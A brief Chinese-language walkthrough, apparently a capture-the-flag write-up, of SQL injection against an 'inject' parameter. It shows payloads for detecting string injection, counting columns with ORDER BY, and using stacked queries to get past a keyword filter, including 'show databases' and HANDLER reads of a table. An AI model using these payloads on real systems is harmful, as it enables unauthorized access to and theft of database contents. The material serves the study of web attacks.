1. 首先判断注入类型
a. 输入 inject=1’ 报错;输入inject=1 不报错;根据报错的提示内容,可知是一个字符型注入
2. 然后判断此表的列数
inject=1'order by 2 -- 不报错
inject=1' order by 3 -- 报错
-- 说明此表只有两列
3. 然后再查询database,table等信息
inject=1' and select 1 ,(select database());
以下报错信息说明,set,select,delete等关键字被过滤了
4. 使用堆叠注入–show暴库
inject=1';show databases;
5. 查表
inject=1';use mysql;show tables;
查询出的表名
6. 查询数据库信息
inject=1';handler words open;handler words read first;
指定信息被找出